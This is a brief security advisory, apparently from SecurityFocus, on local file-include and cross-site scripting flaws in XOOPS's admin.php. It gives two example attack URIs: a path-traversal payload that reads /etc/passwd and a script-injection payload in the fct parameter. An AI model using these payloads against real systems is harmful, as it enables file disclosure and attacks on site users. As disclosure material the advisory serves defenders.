XOOPS Local File Include and Cross Site Scripting Vulnerabilities

Attackers can exploit this issue via a browser.

The following example URIs are available:

For the local file-include issue:

http://www.example.com/scripts_path/modules/system/admin.php?fct=../../../../../../../../../../etc/passwd%00

For the cross-site scripting issue:

http://www.example.com/scripts_path/modules/system/admin.php?fct="><script>alert("xss")</script>


 

Privacy Statement
Copyright 2010, SecurityFocus